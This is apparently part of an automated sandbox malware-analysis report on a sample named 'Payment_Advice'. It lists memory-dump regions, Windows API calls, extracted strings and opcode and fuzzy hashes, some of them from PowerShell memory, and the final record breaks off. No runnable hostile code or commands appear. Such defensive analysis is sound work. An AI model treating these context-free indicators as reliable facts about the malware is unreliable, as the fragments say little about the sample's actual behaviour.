                                                  • Associated: 00000000.00000002.2070512480.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070779494.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Payment_Advice.jbxd
                                                  Similarity
                                                  • API ID: CharPrevlstrcatlstrlen
                                                  • String ID: C:\Users\user\AppData\Local\Temp\
                                                  • API String ID: 2659869361-823278215
                                                  • Opcode ID: ff6b15c2f5550a5b1ad39c2dabef59c5d9ab40b11c2ea079a8f7966cac1aab2f
                                                  • Instruction ID: 44c8f02d27920c7d59b6ae10536407caccd7e36c496fb0f87730dad2d93a7b21
                                                  • Opcode Fuzzy Hash: ff6b15c2f5550a5b1ad39c2dabef59c5d9ab40b11c2ea079a8f7966cac1aab2f
                                                  • Instruction Fuzzy Hash: FFD05261101920AAC222AB488C04D9B67ACEE86301340002AF201B20A2CB7C2E428BFE
                                                  APIs
                                                  • GetFileVersionInfoSizeW.VERSION(00000000,?,000000EE), ref: 00401F17
                                                  • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 00401F39
                                                  • GetFileVersionInfoW.VERSION(?,?,00000000,00000000), ref: 00401F50
                                                  • VerQueryValueW.VERSION(?,00409014,?,?,?,?,00000000,00000000), ref: 00401F69
                                                    • Part of subcall function 00405E2F: wsprintfW.USER32 ref: 00405E3C
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2070469428.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2070450972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070487189.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070779494.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Payment_Advice.jbxd
                                                  Similarity
                                                  • API ID: FileInfoVersion$AllocGlobalQuerySizeValuewsprintf
                                                  • String ID:
                                                  • API String ID: 1404258612-0
                                                  • Opcode ID: ca7f9e254c0363c1f49dfe126ad383ac947da7ba503cf0d7429683875ede6684
                                                  • Instruction ID: 69d4cfede9788cc5a39dfd4732502e81c1ba8e36930914c0ac138746a00c9a3b
                                                  • Opcode Fuzzy Hash: ca7f9e254c0363c1f49dfe126ad383ac947da7ba503cf0d7429683875ede6684
                                                  • Instruction Fuzzy Hash: 27114875A00108BEDB00EFA5D945DAEBBBAEF04344F21407AF501F62E1E7349E50CB68
                                                  APIs
                                                  • IsWindowVisible.USER32(?), ref: 00405135
                                                  • CallWindowProcW.USER32(?,?,?,?), ref: 00405186
                                                    • Part of subcall function 00404179: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040418B
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2070469428.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2070450972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070487189.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070779494.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Payment_Advice.jbxd
                                                  Similarity
                                                  • API ID: Window$CallMessageProcSendVisible
                                                  • String ID:
                                                  • API String ID: 3748168415-3916222277
                                                  • Opcode ID: ffbbbef4bb215af9c79ac16ecb942473111b8a896db240ad95dfeee9b4123394
                                                  • Instruction ID: a693931b294d40b9fc88652aed0c21abafbc2ac9e0ef9b0e0ec3bcc5ba2f922e
                                                  • Opcode Fuzzy Hash: ffbbbef4bb215af9c79ac16ecb942473111b8a896db240ad95dfeee9b4123394
                                                  • Instruction Fuzzy Hash: B2019E71A00609FFDB215F51DD84F6B3726EB84350F508136FA007A2E1C37A8C929F6A
                                                  APIs
                                                  • FreeLibrary.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00000000,75922EE0,004037F4,75923420,0040361F,?), ref: 00403837
                                                  • GlobalFree.KERNEL32(?), ref: 0040383E
                                                  Strings
                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 0040382F
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2070469428.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2070450972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070487189.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070779494.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Payment_Advice.jbxd
                                                  Similarity
                                                  • API ID: Free$GlobalLibrary
                                                  • String ID: C:\Users\user\AppData\Local\Temp\
                                                  • API String ID: 1100898210-823278215
                                                  • Opcode ID: 25d95e5d869358f2c737a5aedab69329feae714e5110f3e95756ca8a51977f9e
                                                  • Instruction ID: 46cd0999c48b818ae3c50a5e697a2c548effd71f48cd6e5996984714d7197a8e
                                                  • Opcode Fuzzy Hash: 25d95e5d869358f2c737a5aedab69329feae714e5110f3e95756ca8a51977f9e
                                                  • Instruction Fuzzy Hash: 01E0C23390503057C7316F14ED05B1ABBE86F89B22F014076F9417B7A183746C528BED
                                                  APIs
                                                  • lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,00402E26,C:\Users\user\Desktop,C:\Users\user\Desktop,00437800,00437800,80000000,00000003), ref: 00405985
                                                  • CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402E26,C:\Users\user\Desktop,C:\Users\user\Desktop,00437800,00437800,80000000,00000003), ref: 00405995
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2070469428.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2070450972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070487189.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070779494.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Payment_Advice.jbxd
                                                  Similarity
                                                  • API ID: CharPrevlstrlen
                                                  • String ID: C:\Users\user\Desktop
                                                  • API String ID: 2709904686-1246513382
                                                  • Opcode ID: 5322967536e1a0efddda02766e650d0d94df305eef9f06c9ed47c97fde570a53
                                                  • Instruction ID: 052b7d625f743090f45407db0d4342bedadcdb208645d65a5e8033f28458e035
                                                  • Opcode Fuzzy Hash: 5322967536e1a0efddda02766e650d0d94df305eef9f06c9ed47c97fde570a53
                                                  • Instruction Fuzzy Hash: 4DD05EB2400A20DAD3226B08DC009AFB3ACEF113107464466F841A21A5D7786D818BE9
                                                  APIs
                                                  • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405CF3,00000000,[Rename],00000000,00000000,00000000), ref: 00405AC9
                                                  • lstrcmpiA.KERNEL32(00405CF3,00000000), ref: 00405AE1
                                                  • CharNextA.USER32(00405CF3,?,00000000,00405CF3,00000000,[Rename],00000000,00000000,00000000), ref: 00405AF2
                                                  • lstrlenA.KERNEL32(00405CF3,?,00000000,00405CF3,00000000,[Rename],00000000,00000000,00000000), ref: 00405AFB
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2070469428.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2070450972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070487189.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070779494.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Payment_Advice.jbxd
                                                  Similarity
                                                  • API ID: lstrlen$CharNextlstrcmpi
                                                  • String ID:
                                                  • API String ID: 190613189-0
                                                  • Opcode ID: f0f41473c1062d639537f97a351ef6b232bfd88747b8e1d85754dbc4161d6f9d
                                                  • Instruction ID: 0e21c6ccf38cfde73736f548742f9065f02c2b70c8696d75456ee166b8786c13
                                                  • Opcode Fuzzy Hash: f0f41473c1062d639537f97a351ef6b232bfd88747b8e1d85754dbc4161d6f9d
                                                  • Instruction Fuzzy Hash: 59F0C231604458AFCB12DBA4CD4099FBBA8EF06250B2140A6F801F7210D274FE019BA9
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2436445372.0000000007990000.00000040.00000800.00020000.00000000.sdmp, Offset: 07990000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7990000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: (ful$(ful$(ful$(ful$(ful$(ful$(ful$(ful$(ful$(ful$(ful$(ful$(ful$(ful$(ful$(ful$(ful$(ful$(ful$(ful$(ful$(ful$(ful$(ful$(ful$(ful$(ful$(ful$(ful$(ful$(ful$(ful$4']q$4']q$4']q$4']q$4']q$4rl$4rl$tLgk$tLgk$tLgk$tLgk$tLgk$tLgk$x.fk$x.fk$x.fk$-fk$-fk
                                                  • API String ID: 0-2309420713
                                                  • Opcode ID: 946eac18a832f2224cfcdf329bc11890c3836e66adf64ed290d38574e5c2e4ed
                                                  • Instruction ID: badf294e95332d583a7a40aa57b60ac14a5a91c7d35586e95eeba6de069047f5
                                                  • Opcode Fuzzy Hash: 946eac18a832f2224cfcdf329bc11890c3836e66adf64ed290d38574e5c2e4ed
                                                  • Instruction Fuzzy Hash: B30362B4A00214DFEB64DB68C990BEAB7B6FF49304F1084A9D9096B741DB71EE81CF51
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2431015764.0000000004E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E50000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_4e50000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: / y$/ y
                                                  • API String ID: 0-3043203095
                                                  • Opcode ID: 14a90e910d45a592aafee672e8773d44848f8a088528eb5dfe6c27db01728208
                                                  • Instruction ID: d1fa1a5aacb2975aede770839e97cf4b8797db5d8e8d7ba8f8e7c12371c22c75
                                                  • Opcode Fuzzy Hash: 14a90e910d45a592aafee672e8773d44848f8a088528eb5dfe6c27db01728208
                                                  • Instruction Fuzzy Hash: 85B16F71E00259DFDF14CFADC9857DDBBF2AF88308F149529E815A7264EB34A941CB81
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2431015764.0000000004E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E50000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_4e50000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: / y$/ y
                                                  • API String ID: 0-3043203095
                                                  • Opcode ID: 1a504a7bbe16e64cf9f49fd8ddb47011ccbaab17170f5d45b782ad0a70351fcd
                                                  • Instruction ID: c0e4d136c933333e0797ef3814fbcccbaa3a84630567076a23ad77fa4a6e7297
                                                  • Opcode Fuzzy Hash: 1a504a7bbe16e64cf9f49fd8ddb47011ccbaab17170f5d45b782ad0a70351fcd
                                                  • Instruction Fuzzy Hash: 0AB16F70E00209DFDF14CFA9D9857DDBBF2AF88318F149529D819EB264EB74A841CB85
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2431015764.0000000004E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E50000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_4e50000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 6f03142df27fde9d9c1ff587d9c31a50727cf57b363151a67d295aac2dd18f37
                                                  • Instruction ID: 8ee0323d577e5f9c4987ef6d87b8de4e8e2a90bd3eafb234662b8b215ce55487
                                                  • Opcode Fuzzy Hash: 6f03142df27fde9d9c1ff587d9c31a50727cf57b363151a67d295aac2dd18f37
                                                  • Instruction Fuzzy Hash: AC419035B002148FDB19DB74C858AAD7BB2EF8D354F045468E806EB7A1DB34AC41CBA0
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2436445372.0000000007990000.00000040.00000800.00020000.00000000.sdmp, Offset: 07990000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7990000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: (ful$(ful$(ful$(ful$(ful$(ful$(ful$(ful$(ful$(ful$(ful$(ful$(ful$(ful$(ful$(ful$(ful$(ful$(ful$(ful$(ful$(ful$(ful$4']q$4']q$4']q$tLgk$tLgk$tLgk$tLgk$x.fk$x.fk$-fk$-fk
                                                  • API String ID: 0-4209968662
                                                  • Opcode ID: dc890e44e8bcd56b1fb609af70af64a89cbce64c72f360bf58dbb42298ca9196
                                                  • Instruction ID: edfa340cdd1e7a1e8e860f3c05ab66d15f89a8d4b4bb2f37cee76d21aed27604
                                                  • Opcode Fuzzy Hash: dc890e44e8bcd56b1fb609af70af64a89cbce64c72f360bf58dbb42298ca9196
                                                  • Instruction Fuzzy Hash: 2EC295B4B002149FDB64DB68C990BEAB7B7EF89304F1085A9D5096B781CB35ED81CF91
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2436445372.0000000007990000.00000040.00000800.00020000.00000000.sdmp, Offset: 07990000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7990000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: (ful$(ful$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q
                                                  • API String ID: 0-3982414120
                                                  • Opcode ID: 9dd9efc7c3c6c2df16ebc4c9a7732a8e2ecde50c9a9217a65523531937a691e5
                                                  • Instruction ID: cc0c0fae7c4c45d020c4de213bb3dd192e09303532a0167480a086c9593c78e4
                                                  • Opcode Fuzzy Hash: 9dd9efc7c3c6c2df16ebc4c9a7732a8e2ecde50c9a9217a65523531937a691e5
                                                  • Instruction Fuzzy Hash: D6A29EB0B00205DFEB24CFACC551BAABBA2FB48704F218569D9056B796CB729D41CF91
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2436445372.0000000007990000.00000040.00000800.00020000.00000000.sdmp, Offset: 07990000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7990000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: (ful$(ful$(ful$(ful$(ful$(ful$(ful$(ful$(ful$(ful$(ful$(ful$(ful$(ful$(ful$(ful$(ful$(ful$(ful$(ful$(ful$4']q$tLgk$tLgk$x.fk$-fk
                                                  • API String ID: 0-769029024
                                                  • Opcode ID: e53576b647ca3d6c2799113300334ab92d7f917a9280557b2a8a5be4d692cb8b
                                                  • Instruction ID: 98dcfdd0dc1ae665893a9c9445a067a1d52f74047dc2fc90dc38462203adc495
                                                  • Opcode Fuzzy Hash: e53576b647ca3d6c2799113300334ab92d7f917a9280557b2a8a5be4d692cb8b
                                                  • Instruction Fuzzy Hash: DF8274B4A00214DFEB24DF58C951BABB7B6EF84304F50C8A9D90A6B751CB71AD81CF91
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2436445372.0000000007990000.00000040.00000800.00020000.00000000.sdmp, Offset: 07990000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7990000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: (ful$(ful$(ful$(ful$(ful$(ful$(ful$(ful$(ful$(ful$(ful$(ful$(ful$(ful$(ful$4']q$4']q$tLgk$x.fk$-fk
                                                  • API String ID: 0-3683346509
                                                  • Opcode ID: 160fc2b95050a13c438045f70f90c149e175a973ce2c62fbe8ba6959c59e950d
                                                  • Instruction ID: 68faa8e31bb7f8244bb7ac40b97836ae39faf22235a48db89c95235fb2b45509
                                                  • Opcode Fuzzy Hash: 160fc2b95050a13c438045f70f90c149e175a973ce2c62fbe8ba6959c59e950d
                                                  • Instruction Fuzzy Hash: 397281B4A00214DFEB24DF58C951BAAB7B6EF84304F50C8A9D90A6B745CF71AD81CF91
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2436445372.0000000007990000.00000040.00000800.00020000.00000000.sdmp, Offset: 07990000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7990000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: (ful$(ful$(ful$(ful$(ful$(ful$(ful$(ful$(ful$(ful$(ful$(ful$4']q$tLgk$x.fk$-fk
                                                  • API String ID: 0-800970596
                                                  • Opcode ID: 698bb253f50062991990e3b5839e7c64a54aaf8ca6df298663eb7efab5dfd48e
                                                  • Instruction ID: f65f4654e540db05003e1be90dea6fa2b8964feac07b8eca1d21e1d449277c1b
                                                  • Opcode Fuzzy Hash: 698bb253f50062991990e3b5839e7c64a54aaf8ca6df298663eb7efab5dfd48e
                                                  • Instruction Fuzzy Hash: D95273B4A00214DFEB24DF58C951BAAB7B2EF84304F50C9A9D90A6B751CB71ED81CF91
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2436445372.0000000007990000.00000040.00000800.00020000.00000000.sdmp, Offset: 07990000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7990000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: (ful$(ful$(ful$(ful$(ful$(ful$(ful$(ful$(ful$(ful$(ful$(ful$4']q$tLgk$x.fk$-fk
                                                  • API String ID: 0-800970596
                                                  • Opcode ID: c8b4a0249b9e16ef46737884ffaf68129b65e795db51ac9d6657d02e08ff3763
                                                  • Instruction ID: 2a734899bb2a2c13abc3a4237af8154c7a1a8a49a8c01cd74c90cf18de0bdd8c
                                                  • Opcode Fuzzy Hash: c8b4a0249b9e16ef46737884ffaf68129b65e795db51ac9d6657d02e08ff3763
                                                  • Instruction Fuzzy Hash: 554282F4B002149FDB64DB58CA90BAAB7B7EF89304F1085A9D5096B781DB32ED81CF51
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2436445372.0000000007990000.00000040.00000800.00020000.00000000.sdmp, Offset: 07990000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7990000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q$4']q
                                                  • API String ID: 0-958751914
                                                  • Opcode ID: 51ffbe42d6a930613b8f1231ea9e00dca8eac68e6179c5d2449532c5182f95d7
                                                  • Instruction ID: 6e596800acb8d104493e6bc5b45c6f567818bba46685e469b58fb89523079db7
                                                  • Opcode Fuzzy Hash: 51ffbe42d6a930613b8f1231ea9e00dca8eac68e6179c5d2449532c5182f95d7
                                                  • Instruction Fuzzy Hash: DC8292B0B01205DFEB21CFA8C551BAABBB2FB48704F218569D9056F782CB729D51CF91
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2436445372.0000000007990000.00000040.00000800.00020000.00000000.sdmp, Offset: 07990000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7990000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: (ful$(ful$(ful$(ful$(ful$4']q$4rl$tLgk$x.fk
                                                  • API String ID: 0-3965685729
                                                  • Opcode ID: 0f1a2f6a28a91a4e164ab1837eb51686616fdaa356799cb4ae2eefbb085ba666
                                                  • Instruction ID: 4005349954ee4ea1598c85608dfc2cf43c7e2516f1f982c44969135484b5fea3
                                                  • Opcode Fuzzy Hash: 0f1a2f6a28a91a4e164ab1837eb51686616fdaa356799cb4ae2eefbb085ba666
                                                  • Instruction Fuzzy Hash: 34122AB4B04215DFEB24DB28C980BA9B7B6FB45308F0088E9D509AB751DB71EE81CF51
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2436445372.0000000007990000.00000040.00000800.00020000.00000000.sdmp, Offset: 07990000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7990000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: (ful$(ful$(ful$(ful$(ful$4']q$4rl$tLgk$x.fk
                                                  • API String ID: 0-3965685729
                                                  • Opcode ID: 253ced9447bd1f8e5e5494d7533a45384c791cdc3f59a1d2b6ffe56fb5ec2fa9
                                                  • Instruction ID: 6c065d178a3695c1411020ab257e260cabcc1ad3b90bc7f1c275223ce7f3e612
                                                  • Opcode Fuzzy Hash: 253ced9447bd1f8e5e5494d7533a45384c791cdc3f59a1d2b6ffe56fb5ec2fa9
                                                  • Instruction Fuzzy Hash: 47121BB4B04215DFEB64DB18C980BA9B7B6FB49308F0088E9D509AB750DB71EE81CF51
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2436445372.0000000007990000.00000040.00000800.00020000.00000000.sdmp, Offset: 07990000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7990000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: (ful$(ful$4']q$4']q$4']q$4']q$x.fk$-fk
                                                  • API String ID: 0-1086513769
                                                  • Opcode ID: a9af97f79d0960b64bd3f1ba8a5cb1e68f234ab234a0aac0f8ab995856e8e4bb
                                                  • Instruction ID: 8808b9ecb29b4e8dffd9bacbaafe3041b144ee385f05158cdc6589df5b597f17
                                                  • Opcode Fuzzy Hash: a9af97f79d0960b64bd3f1ba8a5cb1e68f234ab234a0aac0f8ab995856e8e4bb
                                                  • Instruction Fuzzy Hash: 45E1B0B0B002489FDB15DB6CC551BAEBBA6EF88308F508469D4046F365CF76EC56CB91
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2436445372.0000000007990000.00000040.00000800.00020000.00000000.sdmp, Offset: 07990000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7990000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: (ful$4']q$4']q$x.fk$-fk
                                                  • API String ID: 0-3139061712
                                                  • Opcode ID: d3fb5c174ec3ef631cb8bf351c159bbcbf8285757dd9e02ce8b3c23f17b29da0
                                                  • Instruction ID: cc8a324faa8bca77318e7f913877b9cf4cbefad23a360c94f760ff643f629d0e
                                                  • Opcode Fuzzy Hash: d3fb5c174ec3ef631cb8bf351c159bbcbf8285757dd9e02ce8b3c23f17b29da0
                                                  • Instruction Fuzzy Hash: 0FC1BDF0A002459FDB15CF58C540BAEBBB6AF89308F54C469D8046F3A5CB76EC56CB91
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2436445372.0000000007990000.00000040.00000800.00020000.00000000.sdmp, Offset: 07990000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7990000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
